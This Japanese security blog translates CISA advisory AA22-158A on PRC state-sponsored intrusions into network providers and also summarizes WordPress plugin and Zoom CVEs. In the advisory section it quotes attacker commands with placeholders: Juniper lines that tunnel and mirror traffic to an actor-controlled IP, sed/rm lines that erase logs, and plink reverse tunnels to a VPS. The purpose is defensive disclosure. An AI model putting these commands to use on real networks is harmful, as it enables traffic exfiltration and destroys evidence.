Jun 8, 2022

Alert (AA22-158A) 中華人民共和国 国家に支援されたサイバー犯罪者がネットワークプロバイダーとデバイスを搾取する

興味深い「出典」記事を日本語化してみた。

「ベストプラクティス」や「緩和策」に書かれているのは、基本的な(やっていて当然な)対策ばかりである。しかしながら実施する立場に居ると、リソース不足などを理由に、出来ない言い訳をしたくもなりそうだ。自組織での取り組みの方針・手順が定められているか、それに則りリスク評価したか、リスク評価に基づき対策実施すべきだが、実施できない場合はリスクを許容できるのか(組織責任者の決裁が得られるか)、という視点で読むと気づきも多い。


Summary  概要

Best Practices ベストプラクティス

  • Apply patches as soon as possible
  • Disable unnecessary ports and protocols
  • Replace end-of-life infrastructure 
  • Implement a centralized patch management system 
    • できるだけ早くパッチを適用する
    • 不要なポートやプロトコルを無効化する
    • 耐用年数が経過したインフラをリプレースする
    • 集中型パッチ管理システムを導入する 
This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.
この共同サイバーセキュリティ勧告では、中華人民共和国(PRC)の国家に支援されたサイバー行為者が、侵害されたインフラの広範なネットワークを確立するために、公に知られた脆弱性を悪用し続ける方法について説明します。これらのサイバー攻撃者は、このネットワークを利用して、公共機関や民間企業を含む世界中のさまざまな標的を攻撃しています。本アドバイザリーでは、大手通信事業者やネットワークサービスプロバイダーが標的とされ、侵害されたこと、および2020年以降サイバー行為者によって日常的に悪用されているネットワーク機器に関連するトップの脆弱性(主にCommon Vulnerabilities and Exposures(CVEs))について詳述しています。

This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
この共同サイバーセキュリティ勧告は、国家安全保障局(NSA)、サイバーセキュリティおよびインフラセキュリティ局(CISA)、連邦捜査局(FBI)が共同で作成したものです。この報告書は、これまでの NSA、CISA、FBI の報告を基に、連邦政府および州・地方・部族・準州(SLTT)政府、防衛産業基盤(DIB)を含む重要インフラ(CI)、民間企業に対し、注目すべき傾向と根強い戦術・技術・手順(TTPs)に関する情報を提供するものです。

Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.
この勧告に記載されている脆弱性を緩和するには、利用可能なパッチをシステムに適用し、耐用年数が経過したインフラを交換し、集中パッチ管理プログラムを導入する必要があります。

NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.
NSA、CISA、FBI は、米国および同盟国の政府、情報収集機関、民間企業組織が、「緩和策」のセクションおよび「付録 A:脆弱性」に記載された推奨事項を適用して防御体制を強化し、PRC 国家支援による悪質なサイバー行為者が重要ネットワークに影響を及ぼすリスクを低減することを強く推奨します。

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.
中国がスポンサーとなっている悪質なサイバー活動の詳細については、CISAのChina Cyber Threat Overview and Advisoriesウェブページを参照してください。

Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors 中華人民共和国の国家が支援するサイバーアクターが悪用する一般的な脆弱性

PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.
中国が支援するサイバー・アクターは、脆弱性を悪用して、パッチの適用されていないネットワーク・デバイスを容易に危険にさらすことができます。スモールオフィス/ホームオフィス(SOHO)ルーターやネットワーク接続ストレージ(NAS)デバイスなどのネットワークデバイスは、コマンド&コントロール(C2)トラフィックを転送するための追加のアクセスポイントとして機能し、他のエンティティにネットワーク侵入を行うための中間点として機能します。ここ数年、ネットワーク機器に深刻度の高い脆弱性が相次いで発見され、サイバー攻撃者は、脆弱なインフラ機器を定期的に悪用してアクセスする能力を身につけました。さらに、これらのデバイスは、インターネットに面したサービスやエンドポイントデバイスの定期的なソフトウェアパッチを維持し、ペースを保つことに苦労しているサイバーディフェンダーによって見過ごされがちです。

Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133]  or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.
2020年以降、中国が支援するサイバーアクターは、一般に特定されたセキュリティ脆弱性(CVEs)を迅速に悪用するキャンペーンを広く行っています。この手法により、サイバー犯罪者は、被害者組織がシステムを更新する前に行動する限り、独自の特徴やマルウェアを特定することなく、仮想プライベートネットワーク(VPN)サービス[T1133]や公共向けアプリケーション[T1190]に対して公開されている悪用コードを使用して、被害者のアカウントにアクセスすることができました。

PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.
中国の国家に支援されたサイバー攻撃者は、通常、中国のインターネット・サービス・プロバイダー(ISP)に解決される多数の中国ベースのIPアドレスからホップポイントと呼ばれる危険なサーバにアクセスすることによって、侵入を実行します。サイバー攻撃者は通常、ホスティングプロバイダーから直接または間接的にリモートアクセスをリースすることで、サーバーの利用権を取得します。彼らはこれらのサーバを使用して、業務用電子メールアカウントの登録とアクセス、C2ドメインのホスト、および被害者ネットワークとのやり取りを行います。サイバー攻撃者は、被害者ネットワークと対話する際に、これらのホップポイントを難読化技術として使用します。

These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.
また、これらのサイバー攻撃者は、防御を回避するための戦術を常に進化させ、適応させています。NSA、CISA、FBIは、国家に支援されたサイバー行為者がネットワーク防御者のアカウントと行動を監視し、必要に応じて進行中のキャンペーンを修正し、検知されないようにしていることを確認しています。サイバー攻撃者は、進行中のキャンペーンに関連する情報が公開されると、直ちにそのインフラとツールセットを修正しました。中国の国家に支援されたサイバー攻撃者は、カスタマイズしたツールセットと一般に入手可能なツール、特にネットワーク環境にネイティブなツールを混合し、ネットワークのノイズや通常の活動に紛れ込ませることで活動を不明瞭にすることがよくあります。

NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.
NSA、CISA、FBIは、表1に示す共通脆弱性公表(CVE)を、2020年以降にPRC国家支援型サイバー行為者によって最も頻繁に悪用されたネットワークデバイスCVEであるとみなしています。

Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors

Vendor          CVE             CVSS / Vulnerability Type

Cisco

CVE-2018-0171

9.8 Critical / RCE(*1)

CVE-2019-15271

8.8 High   / RCE

CVE-2019-1652

7.2 High   / RCE

Citrix

CVE-2019-19781

9.8 Critical / RCE

DrayTek

CVE-2020-8515

9.8 Critical / RCE

D-Link

CVE-2019-16920

9.8 Critical / RCE

Fortinet

CVE-2018-13382

7.5 High (->NIST, 9.1->CNA) /

Auth. Bypass

MikroTik

CVE-2018-14847

9.1 Critical / Auth. Bypass

Netgear

CVE-2017-6862

9.8 Critical / RCE

Pulse

CVE-2019-11510

10.0 Critical / Auth. Bypass

CVE-2021-22893

10.0 Critical / RCE

QNAP

CVE-2019-7192

9.8 Critical / Privilege Elevation

CVE-2019-7193

9.8 Critical / Remote Inject

CVE-2019-7194

9.8 Critical / XML Routing

Detour Attack

CVE-2019-7195

9.8 Critical / XML Routing

Detour Attack

Zyxel

CVE-2020-29583

9.8 Critical / Auth. Bypass


*1 RCE = Remote Code Execution   


Telecommunications and network service provider targeting  通信事業者、ネットワークサービス事業者の標的化

PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.
中国国家が支援するサイバーアクターは、偵察と脆弱性スキャンのためにオープンソースのツールを頻繁に利用します。この行為者は、オープンソースのルーター専用ソフトウェアフレームワークである RouterSploit および RouterScan [T1595.002] を利用して、さらなる調査や悪用に向けてメーカー、モデル、および既知の脆弱性を特定しています。RouterSploitフレームワークは、組み込みデバイスに特化したオープンソースのエクスプロイトフレームワークです。RouterScanは、IPアドレスの脆弱性を簡単にスキャンできるオープンソースのツールです。これらのツールにより、Cisco、Fortinet、MikroTikなど、業界の主要プロバイダが製造するSOHOなどのルータを悪用することができます。

Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts.
通信事業者やネットワーク・サービス・プロバイダへの侵入の足がかりとして、中国が支援するサイバー・アクターは、認証、認可、アカウンティングのセキュリティを維持するために重要なシステムを含む重要なユーザーとインフラを特定します。重要なリモート認証ダイヤルインユーザーサービス(RADIUS)サーバーを特定した後、サイバーアクターは、基盤となる構造化クエリー言語(SQL)データベースにアクセスする認証情報を取得し [T1078]、SQLコマンドを利用して、ユーザーおよび管理アカウントの平文およびハッシュ化されたパスワードの両方を含む認証情報 [T1555] を吐き出しました。

Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.
RADIUSサーバから認証情報を取得したPRCの国営サイバーアクターは、これらの認証情報をカスタム自動スクリプトで使用し、Secure Shell(SSH)を介してルータに認証し、ルータのコマンドを実行し、その出力を保存しました[T1119]。これらのスクリプトは、CiscoおよびJuniperルータを標的とし、各ルータの現在の設定を含む、実行されたコマンドの出力を保存しました。コマンド出力のキャプチャに成功した後、これらのコンフィギュレーションは、ネットワーク外の行為者のインフラストラクチャに流出しました[TA0010]。サイバー攻撃者は、ルータやスイッチが多数存在する中規模から大規模の被害者ネットワークをさらに自動化するために、追加のスクリプトを使用して、ネットワーク内のトラフィックをうまく操作するために必要なルータの設定を大量に収集していたと思われます。

Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.

サイバーアクターは、侵害された RADIUS サーバーから有効なアカウントと認証情報、およびルーターの設定情報を入手してネットワークに戻り、そのアクセスと知識を利用して、ルーターで認証成功し、ルーターのコマンドを実行し、[T1599]を密かにルーティングし、[T1020.001]をキャプチャして、ネットワークからアクターの管理するインフラにトラフィックを流し込むことに成功しました。

While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:

他のメーカーにも同様のコマンドがあると思われますが、サイバーアクターは、Juniperルーターで以下のコマンドを実行し、最終的にネットワークから流出させるための初期トンネル設定を行いました。

set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>

set chassis network-services all-ethernet

set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>

set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>


After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.

サイバーアクターは、トンネルを確立した後、デバイス上のローカルインターフェースを設定し、アクターが管理するインフラにトラフィックをルーティングするようルーティングテーブルを更新しました。

 

set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>

set routing-options static route <local network IP address> next-hop <actor controlled IP address>

 

PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.

その後、中国が支援するサイバーアクターがポートミラーリングを設定し、すべてのトラフィックをローカルインターフェースにコピーし、トンネルを通じてネットワークからアクターの管理するインフラに転送されました。

 

set firewall family inet filter <filter name> term <filter variable> then port-mirror

set forwarding-options port-mirroring input rate 1

set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>

set forwarding-options port-mirroring family inet output no-filter-check

set interfaces <interface-id> unit <unit number> family inet filter input <filter name>

set interfaces <interface-id> unit <unit number> family inet filter output <filter name>

 

Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.

サイバー攻撃者は、設定の変更を完了した後、しばしばローカルのログファイルを修正・削除し、自分たちの活動の証拠を隠滅して、自分たちの存在をさらにわかりにくくし、検知を回避しています。

 

sed -i -e '/<REGEX>/d' <log filepath 1>

sed -i -e '/<REGEX>/d' <log filepath 2>

sed -i -e '/<REGEX>/d' <log filepath 3>

rm -f <log filepath 4>

rm -f <log filepath 5>

rm -f <log filepath 6>

 

PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.

また、中国の国家に支援されたサイバーアクターは、PuTTY LinkPlinkのようなコマンドラインユーティリティプログラムを利用して、内部ホストとリースされた仮想プライベートサーバ(VPSインフラとの間にSSHトンネル[T1572を確立していました。これらの行為者は、外部のパブリックIPドレスを明らかにするために、C2インフラストラクチャにハイパーテキスト転送プロトコル(HTTPリクエストを送信することによって、これらのホストネットワーク上でシステムネットワーク構成の発見[T1016.001]をしばしば実施しました。

 

plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>

plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>


 

Mitigations .. 緩和策

 

NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:

NSACISA、および FBI は、以下の推奨事項、および、観測された戦術や技術に合わせた付録 A の緩和策と検出策を適用するよう組織に促します。一部の脆弱性には、以下に示す特定の追加緩和策がありますが、一般的には、以下の緩和策が適用されます。

 

  • Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
  • Segment networks to limit or block lateral movement [D3-NI].
  • Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF].
  • Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA].
  • Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP].
  • Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
  • Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.
  • Disable external management capabilities and set up an out-of-band management network [D3-NI].
  • Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
  • Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
  • Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
  • Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM].
  • Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.

  • パッチがリリースされたら、できるだけ早くシステムおよび製品を更新し、パッチを適用する [D3-SU] 。このプロセスを自動化し、迅速化するために、集中型パッチ管理システムの活用を検討する。
  • 侵害された疑いのあるデバイスをネットワークから直ちに削除または隔離する [D3-ITF] [D3-OTF] 
  • ネットワークをセグメント化し、横方向の動きを制限またはブロックする[D3-NI]
  • 使用されていない、または不要なネットワークサービス、ポート、プロトコル、デバイスを無効にする [D3-ACH] [D3-ITF] [D3-OTF].
  • すべてのユーザーに対して例外なく多要素認証(MFAを強制する [D3-MFA]
  • すべてのVPN接続でMFAを強制する[D3-MFA]MFA が利用できない場合、パスワードの複雑さの要件を強制する [D3-SPP]
  • 厳格なパスワード要件を実装し、パスワードの複雑さを強制し、決められた頻度でパスワードを変更し、定期的にアカウントレビューを行い、コンプライアンスを確保する [D3-SPP].
  • 定期的にデータのバックアップ手順を実行し、最新のインシデント対応と復旧手順を維持する。
  • 外部管理機能を無効にし、帯域外管理ネットワークを設定する [D3-NI] 
  • 内部ネットワークの露出を減らすために、ネットワーク非武装化ゾーン(DMZでインターネットに面したサービスを隔離する [D3-NI].
  • インターネット向けサービスの堅牢なログを有効にし、ログに危険の兆候がないか監視する [D3-NTA] [D3-PM] 
  • 専用の管理システム[D3-PH]とシステム管理者用のアカウントを確実に用意する。これらのアカウントは厳格なネットワークポリシーで保護する [D3-UAP]
  • ネットワークインフラへのアクセス、構成変更、および認証、承認、アカウンティング機能を実行する重要なインフラサービスの堅牢なログとレビューを可能にする[D3-PM]
  • ネットワークの一部で確認されたインシデントに対応する際、対応チームはネットワークインフラへのアクセスを精査し、ネットワークインフラへの潜在的な横方向の動きを評価し、発見内容に見合った是正措置を実行する必要があります。

 

Ref.  (出典)

Alert (AA22-158A)

People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

Original release date: June 07, 2022

https://www.cisa.gov/uscert/ncas/alerts/aa22-158a

 

参考

CISA Alert (AA22-158A) 中華人民共和国に支援されたサイバー犯罪者がネットワークプロバイダーやデバイスを悪用している (2022.06.07)

http://maruyama-mitsuhiko.cocolog-nifty.com/security/2022/06/post-789533.html


Jun 7, 2022

Vulnerability Summary for the Week of May 16, 2022、その6、WordPress編

知名度の高さ、ユーザの多さと、今回の脆弱性のまとまった数とから、本ソフトウェアだけ特別編として掲示します。関係者は個々のCVEリンクまたは「出典」から解決策(多くはupdate)を実施下さい。

 

wordpress関連、全49件、内CRITICALHIGHのものは12

以下、当ブログ主の私見を書いておく。

久々にNIST文書をウォッチしたところ、WordPress連プラグインの件数が圧倒的で、昔よく聞いて名前くらいは憶えているが未だにそうなのだな、と驚いた。背後に苦しんでいる関係者の姿が想像でき、何か息苦しい気分にさせられた。

このプラグインの種類や件数の多さは、脆弱性の発表をウォッチしていれば防げるレベルを超えていると感じる。

pluginを使わない」という選択肢が有効そうだが、(現場を知らない私の想像だが)それは「便利だから」という声に消されてしまうのではないか? 

或いは対策として、pluginを使わないよう(システム環境が意図せず変更されないよう)あるべき状態が維持されているか常にモニタリングしたり、個々の脆弱性を分析し対応を検討・実施(場合によってはロールバック)する手間暇を掛け、結局将来のリスクも背負い続けるくらいなら、wordpressを使わない」という選択肢も検討してはどうだろうか?

 

wordpress -- wow-company's_hover_effects_plugin

CVE-2022-29446

WordPress  Wow-Company  Counter Box プラグイン 1.1.1 以下 に、認証済み (管理者以上の役割のローカルファイル取り込み (LFI) 脆弱性が存在します。 

NIST: NVD Base Score:  7.2 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 

CNA:  Patchstack Base Score:  6.8 MEDIUM Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

※ CNA評価はNISTに比べて甘め

 

CVE-2022-29447 

WordPress  Wow-Company  Hover Effects プラグイン 2.1 以下 に、認証済み (管理者以上のユーザーロールのローカルファイル取り込み (LFI) の脆弱性が存在します。 

NIST: NVD Base Score:  7.2 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CNA:  Patchstack Base Score:  6.8 MEDIUM Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

※ CNA評価はNISTに比べて甘め

 

wordpress -- wow-company's_popup_box_plugin

CVE-2022-29445

WordPress  Wow-Company's Popup Box プラグイン 2.1.2以下 に、認証済み (管理者以上のロールのローカルファイル取り込み (LFI) 脆弱性があります 

NIST: NVD Base Score:  7.2 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

 

wordpress -- vikbooking_hotel_booking_engine_&_pms_wordpress_plugin

CVE-2022-1409

1.5.8 以前の VikBooking Hotel Booking Engine & PMS WordPress プラグインは、画像を適切に検証しないため、管理者などの高い権限を持つユーザーが画像に見せかけた、悪意のある PHP コードを含む PHP ファイルをアップロードすることができます。

NIST: NVD Base Score:  7.2 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

 

wordpress -- visual_slide_box_builder_wordpress_plugin

CVE-2022-1182

Visual Slide Box Builder WordPress プラグイン 3.2.9 では、SQL 文で使用する前にさまざまなパラメータをサニタイズおよびエスケープせず、認証済みユーザー(購読者など)が利用できる AJAX アクションの一部で、SQL インジェクションが発生する可能性があります。 

NIST: NVD Base Score:  8.8 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

wordpress -- pricing_table_wordpress_plugin

CVE-2022-0867

3.6.1 以前の WordPress プラグイン Pricing Table では、ユーザーが入力した POST データが SQL 文で補間され、未認証のユーザーが利用できる AJAX アクションで実行される前に、適切にサニタイズおよびエスケープされないことがあります。 

NIST: NVD  Base Score:  9.8 CRITICAL  Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

※ pricing table系プラグインの、未認証ユーザが悪用可能なCriticalな脆弱性!!

 

wordpress -- fusion_builder_wordpress_plugin

CVE-2022-1386

Avadaテーマで使用している3.6.2以前のFusion Builder WordPressプラグインは、任意のHTTPリクエストを開始するために使用できるフォーム内のパラメータを検証していません。

このパラメータは、任意の HTTP リクエストを開始するために使用することができます。

これは、ファイアウォールやアクセス制御をバイパスして、サーバーのローカルネットワーク上のホストと対話するために使用される可能性があります。

NIST: NVD Base Score:  9.8 CRITICAL Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

※ 「フォーム内のパラメータを検証していない」なら、不正なパラメータをきっかけに開始されたHTTPリクエストが「ファイアウォールやアクセス制御をバイパス」するのも、さらに「ローカルネットワーク上の他のホストと対話する」ことも有りえると想像が及び、Criticalな脆弱性であると合点がいく。

wordpress -- alexander_stokmann's_code_snippets_extended_plugin

CVE-2022-29429

Alexander Stokmann 氏の Code Snippets Extended プラグイン 1.4.7 以下において、クロスサイトリクエストフォージェリを経由したリモートコード実 (RCE) が発生する可能性があります。

CNA:  Patchstack Base Score:  8.8 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

wordpress -- agil_wordpress_plugin

CVE-2021-25119

1.0までのAGIL WordPressプラグインは、すべてのzipファイルを受け入れ、抽出されたファイルの種類を検証することなく、自動的にzipファイルを抽出します。

その結果、admin などの高権限ユーザが PHP のような任意のファイルをアップロードできるようにし、RCE に誘導します。

NIST: NVD Base Score:  7.2 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

 

wordpress -- aftab_muni's_disable_right_click_for_wp_plugin

CVE-2022-29427

WordPress  Aftab Muni  Disable Right Click For WP プラグイン 1.1.6以下には、クロスサイトリクエストフォージェリ(CSRF)の脆弱性があります。

NIST: NVD Base Score:  8.8 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CNA:  Patchstack Base Score:  4.3 MEDIUM Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

※ CNAはNISTに比べて甘い評価

 

wordpress -- advanced_uploader-wordpress_plugin

CVE-2022-1103

4.2 までの Advanced Uploader WordPress プラグインでは、購読者のような任意の認証済みユーザーが PHP などの任意のファイルをアップロードでき、RCE につながる可能性があります。

NIST: NVD Base Score:  8.8 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


出典 

Bulletin (SB22-143)
Vulnerability Summary for the Week of May 16, 2022 (release date: May 24)


Vulnerability Summary for the Week of May 16, 2022、その5、Zoom編

知名度の高さ、ユーザの多さと、本件の脆弱性のまとまった数の発表とから、Zoomだけ特別編として掲示します。関係者は「出典」から解決策(多くはupdate)を実施下さい。

 

zoom -- client_for_meetings


CVE-2022-22786

バージョン5.10.0以前のWindowsZoom Client for Meetingsおよびバージョン5.10.0以前のWindowsZoom Rooms for Conference Roomでは、更新処理中にインストールバージョンを適切に確認することができないという問題があります。

この問題は、ユーザーを騙してZoomクライアントをより安全でないバージョンにダウングレードさせる、より高度な攻撃に利用される可能性があります。

 

NIST: NVD Base Score:  8.8 HIGH Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVE-2022-22784

Zoom Client for MeetingsAndroidiOSLinuxMacOS、およびWindows用)バージョン5.10.0以前ではXMPPメッセージ内のXMLスタンザを適切に解析することができません。

この問題を利用すると、悪意のあるユーザーが現在のXMPPメッセージコンテキストから抜け出して新しいメッセージコンテキストを作成し、受信側ユーザーにさまざまなアクションを実行させることができます。

この問題は、サーバーからXMPPメッセージを偽造する、より高度な攻撃で使用される可能性があります。

 

CNA:  Zoom Video Communications, Inc.  Base Score:  8.1 HIGH

  Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

 

CVE-2022-22785

Zoom Client for MeetingsAndroidiOSLinuxMacOS、およびWindows用)バージョン5.10.0以前では、クライアントのセッションクッキーをZoomドメインに適切に制約することができないという問題がありました。この問題は、より高度な攻撃で使用される可能性があり、無防備なユーザーにZoomのセッションクッキーを非Zoomドメインに送信することができます。これにより、Zoomユーザーになりすますことができる可能性があります。

 

NIST: NVD

 Base Score:  9.1 CRITICAL

 Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

  攻撃元区分(AV) = ネットワーク(N)

  攻撃条件の複雑さ(AC) = (L)

  必要な特権レベル(PR) = 不要(N)

  ユーザ関与レベル(UI) = 不要(N)

 

CNA:  Zoom Video Communications, Inc.

 Base Score:  5.9 MEDIUM

 Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:L

 

 Zoom社自身によるリスク評価は甘目。
  結果的に Medium → Critical へと2段階 深刻な評価に落ち着いた。

  こういう事もあるので、制作・販売ベンダーの評価だけで安心しないようにしたい。

 

CVE-2022-22787

バージョン5.10.0以前のZoom Client for MeetingsAndroidiOSLinuxmacOS、およびWindows用)は、サーバー切り替え要求時にホスト名を適切に検証できません。

この問題は、より高度な攻撃で使用される可能性があり、無防備なユーザーのクライアントがZoomサービスを使用しようとしたときに、悪意のあるサーバーに接続するように騙される可能性があります。

 

NIST: NVD

 Base Score:  7.5 HIGH

 Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

 

CNA:  Zoom Video Communications, Inc.

 Base Score:  5.9 MEDIUM

 Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:L

 

 Zoom社自身によるリスク評価は甘目である。


YouTube編

 https://www.youtube.com/watch?v=oVINYGjtoWk
 流して聞きたい方向けに、YouTube作ってみました。

出典 

 Bulletin (SB22-143)

 Vulnerability Summary for the Week of May 16, 2022 (release date: May 24)

 

Jun 6, 2022

Vulnerability Summary for the Week of May 16, 2022、その4

seimens -- multiple_products

全6件の内、HIGHは次の2件

CVE-2022-29032
JT2Go (V13.3.0.3未満の全バージョン), Teamcenter Visualization V13.3 (V13.3.0.3未満の全バージョン), Teamcenter Visualization V14.0 (V14.0.0.1未満の全バージョンにおいて、脆弱性が確認されました。
